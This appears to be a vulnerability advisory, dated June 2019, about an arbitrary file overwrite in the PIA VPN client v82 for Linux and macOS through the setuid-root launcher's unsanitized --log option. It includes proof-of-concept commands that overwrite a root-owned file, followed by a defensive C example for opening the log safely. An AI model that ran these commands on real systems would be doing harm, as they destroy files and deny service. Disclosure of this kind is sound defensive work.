Allele Security Alert
Arbitrary File Overwrite
London Trust Media Private
Private Internet Access (PIA) VPN Client for Linux and macOS
Private Internet Access (PIA) VPN Client for Linux and macOS version v82
Private Internet Access (PIA) VPN Client for Linux and macOS v1.2.1 or later
Proof of concept
A vulnerability in the London Trust Media Private Internet Access (PIA) VPN Client v82 for Linux and macOS could allow an authenticated, local attacker to overwrite arbitrary files.
The PIA Linux and macOS openvpn_launcher binary is setuid root. This binary supports the --log option, which accepts a path as an argument. The --log parameter is not sanitized, which allows a local unprivileged user to overwrite arbitrary files owned by any user on the system, including root. This creates a denial of service condition and possible data loss if leveraged by a malicious local user.
Steps to reproduce
Step 1 – Create a root-owned test file. For this PoC /etc/test.txt is used.
    # As root
    echo "this is a test" > /etc/test.txt
    chmod 600 /etc/test.txt
Step 2 – Overwrite the file with the --log option as a non-privileged user.
    # macOS
    /Applications/Private\ Internet\ Access.app/Contents/Resources/openvpn_launcher --log /etc/test.txt

    # Linux
    /opt/pia/openvpn_launcher.64 --log /etc/test.txt
Step 3 – Verify the file contents have been overwritten
    # As root
    cat /etc/test.txt
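For the --log handling described above, this is one general way a setuid-root helper can open a caller-supplied log path. It is an added example, not PIA's code or the vendor's fix. The function name open_log_as_invoker and the "before" pattern in the comment are assumptions, since the launcher's source is not on this page.

```c
/* Added example, not PIA code: open a caller-supplied log path from a
 * setuid-root helper without lending root's file permissions to the caller. */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Assumed "before" pattern, for contrast: with effective uid 0 the kernel's
 * permission check passes for every path the caller names.
 *     fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
 */

/* Hardened form: open with the invoking user's ids, refuse a symlink as the
 * final path component, accept regular files only, never truncate.
 * Returns a descriptor, or -1 with errno set. */
int open_log_as_invoker(const char *path)
{
    uid_t saved_euid = geteuid();
    gid_t saved_egid = getegid();
    struct stat st;
    int fd, err;

    /* Drop the group first: changing it needs the privileged euid. */
    if (setegid(getgid()) != 0 || seteuid(getuid()) != 0)
        return -1;
    fd = open(path, O_WRONLY | O_CREAT | O_APPEND | O_NOFOLLOW, 0600);
    err = errno;
    /* Restore in reverse order; fail closed if that does not work. */
    if (seteuid(saved_euid) != 0 || setegid(saved_egid) != 0) {
        if (fd >= 0)
            close(fd);
        return -1;
    }
    if (fd >= 0 && (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode))) {
        close(fd);
        fd = -1;
        err = EINVAL;
    }
    if (fd < 0)
        errno = err;
    return fd;
}
```

With this pattern the file from Step 1 (root-owned, mode 600) fails to open with EACCES for an unprivileged caller, because the permission check is made against the caller's own uid.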
PIA Linux, macOS Arbitrary File Overwrite
Last modified: June 25, 2019